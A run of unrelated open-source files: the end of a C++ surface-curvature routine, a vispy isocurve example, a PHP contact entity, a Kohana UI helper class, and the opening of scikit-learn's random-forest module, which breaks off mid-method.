dz = (double)neighbors[i].z;
sum11 += dx*dx*dz;
sum12 += 2*dx*dy*dz;
sum13 += dy*dy*dz;
}
a = ATAInv[1][1]*sum11 + ATAInv[1][2]*sum12 + ATAInv[1][3]*sum13;
b = ATAInv[2][1]*sum11 + ATAInv[2][2]*sum12 + ATAInv[2][3]*sum13;
c = ATAInv[3][1]*sum11 + ATAInv[3][2]*sum12 + ATAInv[3][3]*sum13;
free_matrix(ATA, 1, 3, 1, 3);
free_matrix(ATAInv, 1, 3, 1, 3);
g= 4*(a*c - b*b);
m= a + c;
}
//Before using the function, check the normal vector validity
//This form of curvature is calculated based on vertex list, a given center, and
// a given normal diection, and the output is gaussian, mean, and two principle
//curvatures
//
int curvature(Vertex_with_Features & vert, std::slist<Vertex_with_Features *>
nblist, mvVec3f norm, float &g, float & m, float & maxPrinciple, float
& minPrinciple, double & a, double & b, double & c, double & Ay, double & Az, double * trans)
{
std::slist<Vertex_with_Features *>::iterator nbiter;
int i;
double dx, dy, dz;
double sum11, sum12, sum13, sum22, sum23, sum33;
mvVec3f ip;
mvVec3f neighbors[MAX_NEIGHBORS];
double **ATA, **ATAInv;
double cond;
int numn = 0;
double R1[4][4];
double R2[4][4];
double T[4][4], Temp[4][4];
Az = gzangle(norm);
norm = (norm.zRotate(-Az));
Ay = gyangle(norm);
norm = (norm.yRotate(-Ay));
if( trans !=NULL)
{
/* Tansform Matrix is defined as T*X = X'; T = R(2) * R(1) * Tanslation; */
/* R(1) rotate about y
[ cos(Ay) 0 sin(Ay) 0
0 1 0 0
-sin(Ay) 0 cos(Ay) 0
0 0 0 1]
*/
R1[0][0] = cos(-Ay), R1[0][1]=0, R1[0][2] = sin(-Ay), R1[0][3] = 0;
R1[1][0] = 0, R1[1][1]=1, R1[1][2] = 0, R1[1][3] = 0;
R1[2][0] = -sin(-Ay), R1[2][1]=0, R1[2][2] = cos(-Ay), R1[2][3] = 0;
R1[3][0] = 0, R1[3][1]=0, R1[3][2] = 0, R1[3][3] = 1;
/* R(2) rotate about
[ cos(Az) -sin(Az) 0 0
sin(Az) cos(Az) 0 0
0 0 1 0
0 0 0 1]
*/
R2[0][0] = cos(-Az), R2[0][1]=-sin(-Az), R2[0][2] = 0, R2[0][3] = 0;
R2[1][0] = sin(-Az), R2[1][1]=cos(-Az), R2[1][2] = 0, R2[1][3] = 0;
R2[2][0] = 0, R2[2][1]=0, R2[2][2] = 1, R2[2][3] = 0;
R2[3][0] = 0, R2[3][1]=0, R2[3][2] = 0, R2[3][3] = 1;
/* Translation
[ 1 0 0 xs
0 1 0 ys
0 0 1 zs
0 0 0 1] */
T[0][0] = 1, T[0][1]=0, T[0][2] = 0, T[0][3] = -vert.getPX();
T[1][0] = 0, T[1][1]=1, T[1][2] = 0, T[1][3] = -vert.getPY();
T[2][0] = 0, T[2][1]=0, T[2][2] = 1, T[2][3] = -vert.getPZ();
T[3][0] = 0, T[3][1]=0, T[3][2] = 0, T[3][3] = 1;
/* calculate Tranform matrix */
for (int i =0; i < 4 ; i++)
{
for (int j = 0; j < 4; j++)
{
Temp[i][j] = 0;
for (int k = 0; k < 4; k++)
Temp[i][j] += R1[i][k]*R2[k][j] ;
}
}
double * result;
result = trans;
for (int i =0; i < 4 ; i++)
{
for (int j = 0; j < 4; j++)
{
*result = 0;
for (int k = 0; k < 4; k++)
* result += Temp[i][k]*T[k][j] ;
result ++;
}
}
}
nbiter = nblist.begin();
while(nbiter != nblist.end())
{
ip.x = -vert.getPX()+ (*nbiter)->getPX();
ip.y = -vert.getPY()+ (*nbiter)->getPY();
ip.z = -vert.getPZ()+ (*nbiter)->getPZ();
ip = (ip.zRotate(-Az));
ip = (ip.yRotate(-Ay));
neighbors[numn++] = ip;
nbiter++;
}
ATA = matrix<double>(1, 3, 1, 3);
ATAInv = matrix<double>(1, 3, 1, 3);
sum11 = 0; sum12 = 0; sum13 = 0;
sum22 = 0; sum23 = 0; sum33 = 0;
for (i=0; i<numn; i++){
dx = (double)neighbors[i].x;
dy = (double)neighbors[i].y;
sum11 += dx*dx*dx*dx;
sum12 += dx*dx*2*dx*dy;
sum13 += dx*dx*dy*dy;
sum22 += 2*dx*dy*2*dx*dy;
sum23 += 2*dx*dy*dy*dy;
sum33 += dy*dy*dy*dy;
}
ATA[1][1] = sum11;
ATA[1][2] = sum12;
ATA[1][3] = sum13;
ATA[2][1] = sum12;
ATA[2][2] = sum22;
ATA[2][3] = sum23;
ATA[3][1] = sum13;
ATA[3][2] = sum23;
ATA[3][3] = sum33;
invertMatrixSVD(ATA, ATAInv, 3, cond);
sum11 = sum12 = sum13 = 0;
for (i=0; i<numn; i++){
dx = (double)neighbors[i].x;
dy = (double)neighbors[i].y;
dz = (double)neighbors[i].z;
sum11 += dx*dx*dz;
sum12 += 2*dx*dy*dz;
sum13 += dy*dy*dz;
}
a = ATAInv[1][1]*sum11 + ATAInv[1][2]*sum12 + ATAInv[1][3]*sum13;
b = ATAInv[2][1]*sum11 + ATAInv[2][2]*sum12 + ATAInv[2][3]*sum13;
c = ATAInv[3][1]*sum11 + ATAInv[3][2]*sum12 + ATAInv[3][3]*sum13;
free_matrix(ATA, 1, 3, 1, 3);
free_matrix(ATAInv, 1, 3, 1, 3);
g= 4*(a*c - b*b);
m= a + c;
float k1 = m+sqrt(m*m-g);
float k2 = m-sqrt(m*m-g);
maxPrinciple = max(k1,k2);
minPrinciple = min(k1,k2);
}
double gxangle(mvVec3f p)
{
double Ax;
Ax = atan2(p.z, p.y);
return Ax;
}
double gyangle(mvVec3f p)
{
double Ay;
Ay = atan2(p.x, p.z);
return Ay;
}
double gzangle(mvVec3f p)
{
double Az;
Az = atan2(p.y, p.x);
return Az;
}
| clwyatt/CTC | Reference/HongLi/src/capd/curvature.cc | C++ | bsd-3-clause | 12,147 |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
"""
This example demonstrates isocurve for triangular mesh with vertex data.
"""
import numpy as np
from vispy import app, scene
from vispy.geometry.generation import create_sphere
import sys
# Create a canvas with a 3D viewport
canvas = scene.SceneCanvas(keys='interactive',
title='Isocurve for Triangular Mesh Example')
canvas.show()
view = canvas.central_widget.add_view()
cols = 10
rows = 10
radius = 2
nbr_level = 20
mesh = create_sphere(cols, rows, radius=radius)
vertices = mesh.get_vertices()
tris = mesh.get_faces()
cl = np.linspace(-radius, radius, nbr_level+2)[1:-1]
scene.visuals.Isoline(vertices=vertices, tris=tris, data=vertices[:, 2],
levels=cl, color_lev='winter', parent=view.scene)
# Add a 3D axis to keep us oriented
scene.visuals.XYZAxis(parent=view.scene)
view.camera = scene.TurntableCamera()
view.camera.set_range((-1, 1), (-1, 1), (-1, 1))
if __name__ == '__main__' and sys.flags.interactive == 0:
app.run()
| Eric89GXL/vispy | examples/basics/scene/isocurve_for_trisurface.py | Python | bsd-3-clause | 1,317 |
<?php
namespace EmailMarketing\Domain\Entity;
use Doctrine\Common\Collections\ArrayCollection;
use Doctrine\Common\Collections\Collection;
class Contato
{
private $id;
private $nome;
private $email;
private $tags;
public function __construct()
{
$this->tags = new ArrayCollection();
}
public function getTags(): Collection
{
return $this->tags;
}
public function addTags(\Doctrine\Common\Collections\Collection $tags)
{
foreach ($tags as $tag) {
$tag->getContatos()->add($this);
$this->tags->add($tag);
}
return $this;
}
public function removeTags(\Doctrine\Common\Collections\Collection $tags)
{
foreach ($tags as $tag) {
$tag->getContatos()->removeEelement($this);
$this->tags->removeElement($tag);
}
return $this;
}
public function getId()
{
return $this->id;
}
public function getNome()
{
return $this->nome;
}
public function getEmail()
{
return $this->email;
}
public function setId(int $id)
{
$this->id = $id;
return $this;
}
public function setNome(string $nome)
{
$this->nome = $nome;
return $this;
}
public function setEmail(string $email)
{
$this->email = $email;
return $this;
}
}
| adaoex/email-marketing | src/EmailMarketing/Domain/Entity/Contato.php | PHP | bsd-3-clause | 1,436 |
<?php defined('SYSPATH') or die('No direct script access.');
abstract class Kohana_UI {
/**
* Return assets from Masher config. Utilize 3.0 helpers (http://kohanaframework.org/3.0/guide/api/HTML)
*
* // Call position or type specific assets
* UI::masher('footer', 'js', $page);
*
* @author Michael Dyer
* @param string string : location, type, page
* @return Kohana_Ui
* @throws None
*/
public static function masher($location, $type, $page)
{
$assets = array(
'header' => array(
'css' => array(),
'js' => array(),
'str' => '',
),
'footer' => array(
'css' => array(),
'js' => array(),
'str' => '',
),
);
$masher = Kohana::$config->load('masher');
array_push($assets[$location][$type], $masher[$page][$type]);
foreach ($assets[$location][$type][0] as $key => $asset) {
$assets[$location]['str'] .= ($type == 'css') ? HTML::style($asset) : HTML::script($asset);
}
return $assets[$location]['str'];
}
/**
* Return CDN paths for anchor medium
*
* // Link will return a full URI protocol mapped to defaults.config
* UI::link($base, $content, $attributes);
*
* @author Michael Dyer
* @param string string array : base, content, attributes
* @return Kohana_Ui
* @throws None
*/
public static function link($base, $content, $attributes)
{
if(!isset($attributes)) exit;
$defaults = Kohana::$config->load('defaults');
if(isset($base)) {
$attributes['href'] = $defaults['paths'][$base].$attributes['href'];
}
return '<a'.HTML::attributes($attributes).'>'.$content.'</a>';
}
/**
* Return dynamic text wrapper
*
* // Text will wrap content in $type tags
* UI::text($content, $type, $attributes);
*
* @author Michael Dyer
* @param string string array : content, null, null
* @return Kohana_Ui
* @throws None
*/
public static function text($content, $type = null, $attributes = null)
{
if(!isset($type)) $type = 'span';
return '<'.$type.HTML::attributes($attributes).'>'.$content.'</'.$type.'>';
}
/**
* Return CDN paths for image medium
*
* // Link will return a full URI protocol mapped to defaults.config
* UI::image($base, $content, $attributes);
*
* @author Michael Dyer
* @param string string array : base, content, attributes
* @return Kohana_Ui
* @throws None
*/
public static function img($uri, $base = null, $attributes = null)
{
if(!isset($uri)) exit;
$defaults = Kohana::$config->load('defaults');
if(!isset($base)){
$base = 'cdn';
}
$uri = $defaults['paths'][$base].$uri;
return HTML::image($uri, $attributes);
}
}
// END KOHANA UI | listenrightmeow/KOHANA-UI | modules/ui/classes/kohana/ui.php | PHP | bsd-3-clause | 2,622 |
"""
Forest of trees-based ensemble methods.
Those methods include random forests and extremely randomized trees.
The module structure is the following:
- The ``BaseForest`` base class implements a common ``fit`` method for all
the estimators in the module. The ``fit`` method of the base ``Forest``
class calls the ``fit`` method of each sub-estimator on random samples
(with replacement, a.k.a. bootstrap) of the training set.
The init of the sub-estimator is further delegated to the
``BaseEnsemble`` constructor.
- The ``ForestClassifier`` and ``ForestRegressor`` base classes further
implement the prediction logic by computing an average of the predicted
outcomes of the sub-estimators.
- The ``RandomForestClassifier`` and ``RandomForestRegressor`` derived
classes provide the user with concrete implementations of
the forest ensemble method using classical, deterministic
``DecisionTreeClassifier`` and ``DecisionTreeRegressor`` as
sub-estimator implementations.
- The ``ExtraTreesClassifier`` and ``ExtraTreesRegressor`` derived
classes provide the user with concrete implementations of the
forest ensemble method using the extremely randomized trees
``ExtraTreeClassifier`` and ``ExtraTreeRegressor`` as
sub-estimator implementations.
Single and multi-output problems are both handled.
"""
# Authors: Gilles Louppe <g.louppe@gmail.com>
# Brian Holt <bdholt1@gmail.com>
# Joly Arnaud <arnaud.v.joly@gmail.com>
# Fares Hedayati <fares.hedayati@gmail.com>
#
# License: BSD 3 clause
import numbers
from warnings import catch_warnings, simplefilter, warn
import threading
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import issparse
from scipy.sparse import hstack as sparse_hstack
from joblib import Parallel
from ..base import is_classifier
from ..base import ClassifierMixin, RegressorMixin, MultiOutputMixin
from ..metrics import accuracy_score, r2_score
from ..preprocessing import OneHotEncoder
from ..tree import (DecisionTreeClassifier, DecisionTreeRegressor,
ExtraTreeClassifier, ExtraTreeRegressor)
from ..tree._tree import DTYPE, DOUBLE
from ..utils import check_random_state, compute_sample_weight, deprecated
from ..exceptions import DataConversionWarning
from ._base import BaseEnsemble, _partition_estimators
from ..utils.fixes import delayed
from ..utils.fixes import _joblib_parallel_args
from ..utils.multiclass import check_classification_targets, type_of_target
from ..utils.validation import check_is_fitted, _check_sample_weight
__all__ = ["RandomForestClassifier",
"RandomForestRegressor",
"ExtraTreesClassifier",
"ExtraTreesRegressor",
"RandomTreesEmbedding"]
MAX_INT = np.iinfo(np.int32).max
def _get_n_samples_bootstrap(n_samples, max_samples):
"""
Get the number of samples in a bootstrap sample.
Parameters
----------
n_samples : int
Number of samples in the dataset.
max_samples : int or float
The maximum number of samples to draw from the total available:
- if float, this indicates a fraction of the total and should be
the interval `(0.0, 1.0]`;
- if int, this indicates the exact number of samples;
- if None, this indicates the total number of samples.
Returns
-------
n_samples_bootstrap : int
The total number of samples to draw for the bootstrap sample.
"""
if max_samples is None:
return n_samples
if isinstance(max_samples, numbers.Integral):
if not (1 <= max_samples <= n_samples):
msg = "`max_samples` must be in range 1 to {} but got value {}"
raise ValueError(msg.format(n_samples, max_samples))
return max_samples
if isinstance(max_samples, numbers.Real):
if not (0 < max_samples <= 1):
msg = "`max_samples` must be in range (0.0, 1.0] but got value {}"
raise ValueError(msg.format(max_samples))
return round(n_samples * max_samples)
msg = "`max_samples` should be int or float, but got type '{}'"
raise TypeError(msg.format(type(max_samples)))
def _generate_sample_indices(random_state, n_samples, n_samples_bootstrap):
"""
Private function used to _parallel_build_trees function."""
random_instance = check_random_state(random_state)
sample_indices = random_instance.randint(0, n_samples, n_samples_bootstrap)
return sample_indices
def _generate_unsampled_indices(random_state, n_samples, n_samples_bootstrap):
"""
Private function used to forest._set_oob_score function."""
sample_indices = _generate_sample_indices(random_state, n_samples,
n_samples_bootstrap)
sample_counts = np.bincount(sample_indices, minlength=n_samples)
unsampled_mask = sample_counts == 0
indices_range = np.arange(n_samples)
unsampled_indices = indices_range[unsampled_mask]
return unsampled_indices
def _parallel_build_trees(tree, forest, X, y, sample_weight, tree_idx, n_trees,
verbose=0, class_weight=None,
n_samples_bootstrap=None):
"""
Private function used to fit a single tree in parallel."""
if verbose > 1:
print("building tree %d of %d" % (tree_idx + 1, n_trees))
if forest.bootstrap:
n_samples = X.shape[0]
if sample_weight is None:
curr_sample_weight = np.ones((n_samples,), dtype=np.float64)
else:
curr_sample_weight = sample_weight.copy()
indices = _generate_sample_indices(tree.random_state, n_samples,
n_samples_bootstrap)
sample_counts = np.bincount(indices, minlength=n_samples)
curr_sample_weight *= sample_counts
if class_weight == 'subsample':
with catch_warnings():
simplefilter('ignore', DeprecationWarning)
curr_sample_weight *= compute_sample_weight('auto', y,
indices=indices)
elif class_weight == 'balanced_subsample':
curr_sample_weight *= compute_sample_weight('balanced', y,
indices=indices)
tree.fit(X, y, sample_weight=curr_sample_weight, check_input=False)
else:
tree.fit(X, y, sample_weight=sample_weight, check_input=False)
return tree
class BaseForest(MultiOutputMixin, BaseEnsemble, metaclass=ABCMeta):
"""
Base class for forests of trees.
Warning: This class should not be used directly. Use derived classes
instead.
"""
@abstractmethod
def __init__(self,
base_estimator,
n_estimators=100, *,
estimator_params=tuple(),
bootstrap=False,
oob_score=False,
n_jobs=None,
random_state=None,
verbose=0,
warm_start=False,
class_weight=None,
max_samples=None):
super().__init__(
base_estimator=base_estimator,
n_estimators=n_estimators,
estimator_params=estimator_params)
self.bootstrap = bootstrap
self.oob_score = oob_score
self.n_jobs = n_jobs
self.random_state = random_state
self.verbose = verbose
self.warm_start = warm_start
self.class_weight = class_weight
self.max_samples = max_samples
def apply(self, X):
"""
Apply trees in the forest to X, return leaf indices.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The input samples. Internally, its dtype will be converted to
``dtype=np.float32``. If a sparse matrix is provided, it will be
converted into a sparse ``csr_matrix``.
Returns
-------
X_leaves : ndarray of shape (n_samples, n_estimators)
For each datapoint x in X and for each tree in the forest,
return the index of the leaf x ends up in.
"""
X = self._validate_X_predict(X)
results = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
**_joblib_parallel_args(prefer="threads"))(
delayed(tree.apply)(X, check_input=False)
for tree in self.estimators_)
return np.array(results).T
def decision_path(self, X):
"""
Return the decision path in the forest.
.. versionadded:: 0.18
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The input samples. Internally, its dtype will be converted to
``dtype=np.float32``. If a sparse matrix is provided, it will be
converted into a sparse ``csr_matrix``.
Returns
-------
indicator : sparse matrix of shape (n_samples, n_nodes)
Return a node indicator matrix where non zero elements indicates
that the samples goes through the nodes. The matrix is of CSR
format.
n_nodes_ptr : ndarray of shape (n_estimators + 1,)
The columns from indicator[n_nodes_ptr[i]:n_nodes_ptr[i+1]]
gives the indicator value for the i-th estimator.
"""
X = self._validate_X_predict(X)
indicators = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
**_joblib_parallel_args(prefer='threads'))(
delayed(tree.decision_path)(X, check_input=False)
for tree in self.estimators_)
n_nodes = [0]
n_nodes.extend([i.shape[1] for i in indicators])
n_nodes_ptr = np.array(n_nodes).cumsum()
return sparse_hstack(indicators).tocsr(), n_nodes_ptr
def fit(self, X, y, sample_weight=None):
"""
Build a forest of trees from the training set (X, y).
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The training input samples. Internally, its dtype will be converted
to ``dtype=np.float32``. If a sparse matrix is provided, it will be
converted into a sparse ``csc_matrix``.
y : array-like of shape (n_samples,) or (n_samples, n_outputs)
The target values (class labels in classification, real numbers in
regression).
sample_weight : array-like of shape (n_samples,), default=None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. In the case of
classification, splits are also ignored if they would result in any
single class carrying a negative weight in either child node.
Returns
-------
self : object
"""
# Validate or convert input data
if issparse(y):
raise ValueError(
"sparse multilabel-indicator for y is not supported."
)
X, y = self._validate_data(X, y, multi_output=True,
accept_sparse="csc", dtype=DTYPE)
if sample_weight is not None:
sample_weight = _check_sample_weight(sample_weight, X)
if issparse(X):
# Pre-sort indices to avoid that each individual tree of the
# ensemble sorts the indices.
X.sort_indices()
y = np.atleast_1d(y)
if y.ndim == 2 and y.shape[1] == 1:
warn("A column-vector y was passed when a 1d array was"
" expected. Please change the shape of y to "
"(n_samples,), for example using ravel().",
DataConversionWarning, stacklevel=2)
if y.ndim == 1:
# reshape is necessary to preserve the data contiguity against vs
# [:, np.newaxis] that does not.
y = np.reshape(y, (-1, 1))
if self.criterion == "poisson":
if np.any(y < 0):
raise ValueError("Some value(s) of y are negative which is "
"not allowed for Poisson regression.")
if np.sum(y) <= 0:
raise ValueError("Sum of y is not strictly positive which "
"is necessary for Poisson regression.")
self.n_outputs_ = y.shape[1]
y, expanded_class_weight = self._validate_y_class_weight(y)
if getattr(y, "dtype", None) != DOUBLE or not y.flags.contiguous:
y = np.ascontiguousarray(y, dtype=DOUBLE)
if expanded_class_weight is not None:
if sample_weight is not None:
sample_weight = sample_weight * expanded_class_weight
else:
sample_weight = expanded_class_weight
# Get bootstrap sample size
n_samples_bootstrap = _get_n_samples_bootstrap(
n_samples=X.shape[0],
max_samples=self.max_samples
)
# Check parameters
self._validate_estimator()
# TODO: Remove in v1.2
if isinstance(self, (RandomForestRegressor, ExtraTreesRegressor)):
if self.criterion == "mse":
warn(
"Criterion 'mse' was deprecated in v1.0 and will be "
"removed in version 1.2. Use `criterion='squared_error'` "
"which is equivalent.",
FutureWarning
)
elif self.criterion == "mae":
warn(
"Criterion 'mae' was deprecated in v1.0 and will be "
"removed in version 1.2. Use `criterion='absolute_error'` "
"which is equivalent.",
FutureWarning
)
if not self.bootstrap and self.oob_score:
raise ValueError("Out of bag estimation only available"
" if bootstrap=True")
random_state = check_random_state(self.random_state)
if not self.warm_start or not hasattr(self, "estimators_"):
# Free allocated memory, if any
self.estimators_ = []
n_more_estimators = self.n_estimators - len(self.estimators_)
if n_more_estimators < 0:
raise ValueError('n_estimators=%d must be larger or equal to '
'len(estimators_)=%d when warm_start==True'
% (self.n_estimators, len(self.estimators_)))
elif n_more_estimators == 0:
warn("Warm-start fitting without increasing n_estimators does not "
"fit new trees.")
else:
if self.warm_start and len(self.estimators_) > 0:
# We draw from the random state to get the random state we
# would have got if we hadn't used a warm_start.
random_state.randint(MAX_INT, size=len(self.estimators_))
trees = [self._make_estimator(append=False,
random_state=random_state)
for i in range(n_more_estimators)]
# Parallel loop: we prefer the threading backend as the Cython code
# for fitting the trees is internally releasing the Python GIL
# making threading more efficient than multiprocessing in
# that case. However, for joblib 0.12+ we respect any
# parallel_backend contexts set at a higher level,
# since correctness does not rely on using threads.
trees = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
**_joblib_parallel_args(prefer='threads'))(
delayed(_parallel_build_trees)(
t, self, X, y, sample_weight, i, len(trees),
verbose=self.verbose, class_weight=self.class_weight,
n_samples_bootstrap=n_samples_bootstrap)
for i, t in enumerate(trees))
# Collect newly grown trees
self.estimators_.extend(trees)
if self.oob_score:
y_type = type_of_target(y)
if y_type in ("multiclass-multioutput", "unknown"):
# FIXME: we could consider to support multiclass-multioutput if
# we introduce or reuse a constructor parameter (e.g.
# oob_score) allowing our user to pass a callable defining the
# scoring strategy on OOB sample.
raise ValueError(
f"The type of target cannot be used to compute OOB "
f"estimates. Got {y_type} while only the following are "
f"supported: continuous, continuous-multioutput, binary, "
f"multiclass, multilabel-indicator."
)
self._set_oob_score_and_attributes(X, y)
# Decapsulate classes_ attributes
if hasattr(self, "classes_") and self.n_outputs_ == 1:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
return self
@abstractmethod
def _set_oob_score_and_attributes(self, X, y):
"""Compute and set the OOB score and attributes.
Parameters
----------
X : array-like of shape (n_samples, n_features)
The data matrix.
y : ndarray of shape (n_samples, n_outputs)
The target matrix.
"""
def _compute_oob_predictions(self, X, y):
"""Compute and set the OOB score.
Parameters
----------
X : array-like of shape (n_samples, n_features)
The data matrix.
y : ndarray of shape (n_samples, n_outputs)
The target matrix.
Returns
-------
oob_pred : ndarray of shape (n_samples, n_classes, n_outputs) or \
(n_samples, 1, n_outputs)
The OOB predictions.
"""
X = self._validate_data(X, dtype=DTYPE, accept_sparse='csr',
reset=False)
n_samples = y.shape[0]
n_outputs = self.n_outputs_
if is_classifier(self) and hasattr(self, "n_classes_"):
# n_classes_ is a ndarray at this stage
# all the supported type of target will have the same number of
# classes in all outputs
oob_pred_shape = (n_samples, self.n_classes_[0], n_outputs)
else:
# for regression, n_classes_ does not exist and we create an empty
# axis to be consistent with the classification case and make
# the array operations compatible with the 2 settings
oob_pred_shape = (n_samples, 1, n_outputs)
oob_pred = np.zeros(shape=oob_pred_shape, dtype=np.float64)
n_oob_pred = np.zeros((n_samples, n_outputs), dtype=np.int64)
n_samples_bootstrap = _get_n_samples_bootstrap(
n_samples, self.max_samples,
)
for estimator in self.estimators_:
unsampled_indices = _generate_unsampled_indices(
estimator.random_state, n_samples, n_samples_bootstrap,
)
y_pred = self._get_oob_predictions(
estimator, X[unsampled_indices, :]
)
oob_pred[unsampled_indices, ...] += y_pred
n_oob_pred[unsampled_indices, :] += 1
for k in range(n_outputs):
if (n_oob_pred == 0).any():
warn(
"Some inputs do not have OOB scores. This probably means "
"too few trees were used to compute any reliable OOB "
"estimates.", UserWarning
)
n_oob_pred[n_oob_pred == 0] = 1
oob_pred[..., k] /= n_oob_pred[..., [k]]
return oob_pred
def _validate_y_class_weight(self, y):
# Default implementation
return y, None
def _validate_X_predict(self, X):
"""
Validate X whenever one tries to predict, apply, predict_proba."""
check_is_fitted(self)
return self.estimators_[0]._validate_X_predict(X, check_input=True)
@property
def feature_importances_(self):
"""
The impurity-based feature importances.
The higher, the more important the feature.
The importance of a feature is computed as the (normalized)
total reduction of the criterion brought by that feature. It is also
known as the Gini importance.
Warning: impurity-based feature importances can be misleading for
high cardinality features (many unique values). See
:func:`sklearn.inspection.permutation_importance` as an alternative.
Returns
-------
feature_importances_ : ndarray of shape (n_features,)
The values of this array sum to 1, unless all trees are single node
trees consisting of only the root node, in which case it will be an
array of zeros.
"""
check_is_fitted(self)
all_importances = Parallel(n_jobs=self.n_jobs,
**_joblib_parallel_args(prefer='threads'))(
delayed(getattr)(tree, 'feature_importances_')
for tree in self.estimators_ if tree.tree_.node_count > 1)
if not all_importances:
return np.zeros(self.n_features_in_, dtype=np.float64)
all_importances = np.mean(all_importances,
axis=0, dtype=np.float64)
return all_importances / np.sum(all_importances)
# TODO: Remove in 1.2
# mypy error: Decorated property not supported
@deprecated( # type: ignore
"Attribute n_features_ was deprecated in version 1.0 and will be "
"removed in 1.2. Use 'n_features_in_' instead."
)
@property
def n_features_(self):
return self.n_features_in_
def _accumulate_prediction(predict, X, out, lock):
"""
This is a utility function for joblib's Parallel.
It can't go locally in ForestClassifier or ForestRegressor, because joblib
complains that it cannot pickle it when placed there.
"""
prediction = predict(X, check_input=False)
with lock:
if len(out) == 1:
out[0] += prediction
else:
for i in range(len(out)):
out[i] += prediction[i]
class ForestClassifier(ClassifierMixin, BaseForest, metaclass=ABCMeta):
"""
Base class for forest of trees-based classifiers.
Warning: This class should not be used directly. Use derived classes
instead.
"""
@abstractmethod
def __init__(self,
base_estimator,
n_estimators=100, *,
estimator_params=tuple(),
bootstrap=False,
oob_score=False,
n_jobs=None,
random_state=None,
verbose=0,
warm_start=False,
class_weight=None,
max_samples=None):
super().__init__(
base_estimator,
n_estimators=n_estimators,
estimator_params=estimator_params,
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
class_weight=class_weight,
max_samples=max_samples)
@staticmethod
def _get_oob_predictions(tree, X):
"""Compute the OOB predictions for an individual tree.
Parameters
----------
tree : DecisionTreeClassifier object
A single decision tree classifier.
X : ndarray of shape (n_samples, n_features)
The OOB samples.
Returns
-------
y_pred : ndarray of shape (n_samples, n_classes, n_outputs)
The OOB associated predictions.
"""
y_pred = tree.predict_proba(X, check_input=False)
y_pred = np.array(y_pred, copy=False)
if y_pred.ndim == 2:
# binary and multiclass
y_pred = y_pred[..., np.newaxis]
else:
# Roll the first `n_outputs` axis to the last axis. We will reshape
# from a shape of (n_outputs, n_samples, n_classes) to a shape of
# (n_samples, n_classes, n_outputs).
y_pred = np.rollaxis(y_pred, axis=0, start=3)
return y_pred
def _set_oob_score_and_attributes(self, X, y):
"""Compute and set the OOB score and attributes.
Parameters
----------
X : array-like of shape (n_samples, n_features)
The data matrix.
y : ndarray of shape (n_samples, n_outputs)
The target matrix.
"""
self.oob_decision_function_ = super()._compute_oob_predictions(X, y)
if self.oob_decision_function_.shape[-1] == 1:
# drop the n_outputs axis if there is a single output
self.oob_decision_function_ = self.oob_decision_function_.squeeze(
axis=-1
)
self.oob_score_ = accuracy_score(
y, np.argmax(self.oob_decision_function_, axis=1)
)
def _validate_y_class_weight(self, y):
check_classification_targets(y)
y = np.copy(y)
expanded_class_weight = None
if self.class_weight is not None:
y_original = np.copy(y)
self.classes_ = []
self.n_classes_ = []
y_store_unique_indices = np.zeros(y.shape, dtype=int)
for k in range(self.n_outputs_):
classes_k, y_store_unique_indices[:, k] = \
np.unique(y[:, k], return_inverse=True)
self.classes_.append(classes_k)
self.n_classes_.append(classes_k.shape[0])
y = y_store_unique_indices
if self.class_weight is not None:
valid_presets = ('balanced', 'balanced_subsample')
if isinstance(self.class_weight, str):
if self.class_weight not in valid_presets:
raise ValueError('Valid presets for class_weight include '
'"balanced" and "balanced_subsample".'
'Given "%s".'
% self.class_weight)
if self.warm_start:
warn('class_weight presets "balanced" or '
'"balanced_subsample" are '
'not recommended for warm_start if the fitted data '
'differs from the full dataset. In order to use '
'"balanced" weights, use compute_class_weight '
'("balanced", classes, y). In place of y you can use '
'a large enough sample of the full training set '
'target to properly estimate the class frequency '
'distributions. Pass the resulting weights as the '
'class_weight parameter.')
if (self.class_weight != 'balanced_subsample' or
not self.bootstrap):
if self.class_weight == "balanced_subsample":
class_weight = "balanced"
else:
class_weight = self.class_weight
expanded_class_weight = compute_sample_weight(class_weight,
y_original)
return y, expanded_class_weight
def predict(self, X):
"""
Predict class for X.
The predicted class of an input sample is a vote by the trees in
the forest, weighted by their probability estimates. That is,
the predicted class is the one with highest mean probability
estimate across the trees.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The input samples. Internally, its dtype will be converted to
``dtype=np.float32``. If a sparse matrix is provided, it will be
converted into a sparse ``csr_matrix``.
Returns
-------
y : ndarray of shape (n_samples,) or (n_samples, n_outputs)
The predicted classes.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return self.classes_.take(np.argmax(proba, axis=1), axis=0)
else:
n_samples = proba[0].shape[0]
# all dtypes should be the same, so just take the first
class_type = self.classes_[0].dtype
predictions = np.empty((n_samples, self.n_outputs_),
dtype=class_type)
for k in range(self.n_outputs_):
predictions[:, k] = self.classes_[k].take(np.argmax(proba[k],
axis=1),
axis=0)
return predictions
def predict_proba(self, X):
"""
Predict class probabilities for X.
The predicted class probabilities of an input sample are computed as
the mean predicted class probabilities of the trees in the forest.
The class probability of a single tree is the fraction of samples of
the same class in a leaf.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The input samples. Internally, its dtype will be converted to
``dtype=np.float32``. If a sparse matrix is provided, it will be
converted into a sparse ``csr_matrix``.
Returns
-------
p : ndarray of shape (n_samples, n_classes), or a list of such arrays
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute :term:`classes_`.
"""
check_is_fitted(self)
# Check data
X = self._validate_X_predict(X)
# Assign chunk of trees to jobs
n_jobs, _, _ = _partition_estimators(self.n_estimators, self.n_jobs)
# avoid storing the output of every estimator by summing them here
